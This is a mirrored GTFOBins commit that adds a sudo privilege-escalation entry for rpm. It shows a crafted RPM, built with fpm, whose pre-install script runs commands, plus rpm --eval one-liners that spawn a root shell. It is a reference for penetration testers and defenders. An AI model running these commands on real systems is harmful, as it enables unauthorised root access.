mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Add other sudo to rpm thanks to https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/ as in #51
This commit is contained in:
parent
b330297943
commit
a0674eb8f0
@ -6,4 +6,13 @@ functions:
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
sudo:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
- description: |
|
||||
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
|
||||
```
|
||||
TF=$(mktemp -d)
|
||||
echo 'id' > $TF/x.sh
|
||||
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
|
||||
```
|
||||
code: |
|
||||
sudo rpm -ivh x-1.0-1.noarch.rpm
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user